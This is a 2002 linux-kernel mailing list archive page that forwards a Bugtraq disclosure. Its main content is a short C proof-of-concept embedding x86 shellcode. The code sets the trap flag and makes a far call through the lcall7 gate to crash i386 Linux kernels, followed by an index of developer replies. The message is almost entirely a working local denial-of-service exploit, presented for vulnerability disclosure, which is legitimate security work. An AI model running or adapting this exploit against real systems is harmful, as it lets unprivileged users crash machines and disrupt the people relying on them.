public inbox for linux-kernel@vger.kernel.org
 help / color / mirror / Atom feed
* FW: i386 Linux kernel DoS
@ 2002-11-12 23:28 Leif Sawyer
  2002-11-12 23:31 ` Christoph Hellwig
  0 siblings, 1 reply; 14+ messages in thread
From: Leif Sawyer @ 2002-11-12 23:28 UTC (permalink / raw)
  To: linux-kernel

This was posted on bugtraq today...


-----Original Message-----
From: Christophe Devine
Sent: Monday, November 11, 2002 11:26 AM
To: bugtraq@securityfocus.com
Subject: i386 Linux kernel DoS

/* USE AT YOUR OWN RISK ! */

int main( void )
{
    char dos[] = "\x9C"                           /* pushfd       */
                 "\x58"                           /* pop eax      */
                 "\x0D\x00\x01\x00\x00"           /* or eax,100h  */
                 "\x50"                           /* push eax     */
                 "\x9D"                           /* popfd        */
                 "\x9A\x00\x00\x00\x00\x07\x00";  /* call 07h:00h */

    void (* f)( void );

    f = (void *) dos; (* f)();

    return 1;
}

^ permalink raw reply	[flat|nested] 14+ messages in thread

end of thread, other threads:[~2002-11-16 19:26 UTC | newest]

Thread overview: 14+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2002-11-12 23:28 FW: i386 Linux kernel DoS Leif Sawyer
2002-11-12 23:31 ` Christoph Hellwig
2002-11-13  0:10   ` Alan Cox
2002-11-13 23:38     ` Jirka Kosina
2002-11-13 23:58       ` Chris Wright
2002-11-14  9:08       ` Helge Hafting
2002-11-14  3:05     ` Andrea Arcangeli
2002-11-14  4:10       ` Andrea Arcangeli
2002-11-14 18:12       ` Linus Torvalds
2002-11-14 19:00         ` Andrea Arcangeli
2002-11-14 19:17           ` Linus Torvalds
2002-11-15  2:13             ` Andrea Arcangeli
2002-11-14 20:06         ` Petr Vandrovec
2002-11-16 19:33     ` Krzysiek Taraszka

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox